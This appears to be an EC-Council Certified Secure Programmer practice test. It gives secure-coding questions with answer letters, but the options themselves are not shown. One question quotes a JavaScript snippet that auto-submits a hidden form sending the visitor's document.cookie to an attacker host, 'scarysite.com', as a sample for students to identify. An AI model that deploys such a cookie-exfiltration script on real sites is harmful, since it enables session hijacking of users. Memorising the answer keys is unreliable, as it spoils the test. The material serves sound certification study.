EC-COUNCIL EC-Council Certified Secure Programmer v2 - 312-92 Exam Practice Test
What type of problem will result if the following statement is used?
#include <stdio.h>

int main()
{
    short int a;
    unsigned short int b = 32768;
    a = b;
    printf(" a = %d", a);
    b = 65535;
    a = b;
    printf(" a = %d", a);
}
Correct Answer: D
Tyler is in the application testing phase of a particular project. He has decided to use the White Box testing method. Tyler has made a number of changes to his code after some initial tests found some bugs. Tyler now needs to test the code with those changes in place.
What type of testing is Tyler getting ready to perform?
Correct Answer: A
What is one of the dominant factors that lead to insecure programming?
Correct Answer: A
Gerald is a web security consultant for Protectors International. Gerald's main responsibility is to search the Internet for malicious and deceitful sites that the public should be aware of.
Gerald was tipped off about a particular site and is now looking over its source code in a protected environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled upon?
<script>
document.write('<form name=hack method=post action="http://scarysite.com/getit.php"><input type=hidden name=sid value="' + escape(document.cookie) + '">');
document.hack.submit();
</script>
Correct Answer: B
Processes having the "CAP_NET_BIND_SERVICE" can listen on which ports?
Correct Answer: B
Darren has just been hired on as the SQL DBA for Fredrickson Inc., a marketing firm in New York City. He has been asked to clean up the SQL databases on one of the servers. What SQL stored procedure could Darren use to remove user accounts from the databases?
Correct Answer: B
What security package is implemented with the following code?
dwStatus = DsMakeSpn
(
    "ldap",
    "MyServer.Mydomain.com",
    NULL,
    0,
    NULL,
    &pcSpnLength,
    pszSpn
);
rpcStatus = RpcServerRegisterAuthInfo
(
    pszSpn,
    RPC_C_AUTHN_GSS_NEGOTIATE,
    NULL,
    NULL
);
Correct Answer: B
After learning from an external auditor that his code was susceptible to attack, George decided to rewrite some of his code to look like the following. What is George preventing by changing the code?
public void doContent(...) {
    ...
    String s;
    if ((s = getUsernameByID("userid")) != null) {
        s = StringUtils.encodeToHTML(s, 50);
        response.write("<br>Applicant:<u>" + s + "</u>");
    }
    ...
}
Correct Answer: A
Kevin is developing a webpage using HTML and JavaScript code. The webpage will have a lot of important content and will have a number of functions that Kevin does not want revealed through the source code. Why would Kevin choose to employ HTML Guardian to hide the source code of his webpage?
Correct Answer: D
What is defined as the practice of using selected process techniques to improve the quality of a software development effort?
Correct Answer: B